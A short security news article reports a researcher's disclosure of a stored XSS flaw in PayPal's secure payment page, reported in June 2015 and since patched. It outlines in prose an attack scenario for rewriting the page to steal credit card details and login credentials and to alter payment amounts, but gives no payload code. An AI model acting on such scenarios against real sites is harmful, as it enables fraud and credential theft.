Stored XSS Vulnerability In Paypal To Steal Your Credit Card Information

The Security expert Ebrahim Hegazy found a Stored XSS Vulnerability in Paypal secure payment page(https://Securepayments.Paypal.com).When user want to purchase online using paypal then user being redirected to securePayments domain of paypal.It ask user to enter credit card information,cvv and expiry data to complete the transaction.Researchers found the vulnerability in the secure payment page which lets the attacker to steal the credit card information and login credentials even if the data is processed through the encrypted channel(HTTPS) .



Hacking PayPal
As per Ebrahim Hegazy (@Zigoo0) report in a blog post:
“I’ve found a Stored XSS vulnerability that affects the SecurePayment page directly which allowed me to alter the page HTML and rewrite the page content, An attacker can provide his own HTML forms to the user to fulfill and send the users data back to attacker’s server in clear text format, and then use this information to purchase anything in behave of users or even transfer the users fund to his own account!”

Attack scenario of stored XSS vulnerability

Ebrahim explained that the attack scenario is:
  • Attacker setup shopping site or Hack into any shopping site, alter the “CheckOut” button with the Paypal Vulnerability,
  • Paypal user browse the malformed shopping site, choose some products, click on “CheckOut” button to Pay with his Paypal account,
  • User get’s redirected to https://Securepayments.Paypal.com/ to fill the required Credit Card information to complete the purchasing order, In the same page, the products price that will be paid is included inside the same page, and as we know the attacker now control this page!
  • Now when the Paypal user click on Submit Payment button, instead of paying let’s say “100$” YOU WILL PAY THE ATTACKER WHATEVER AMOUNT THE ATTACKER’S DECIDE!!
Below the video PoC published by the expert that shows how the attacker exploits the vulnerability to steal the user Credit Card and login Credentials information.
The expert reported the flaw to Paypal dated 19th june 2015 and got the response from paypal on the same day,now vulnerability patched by paypal.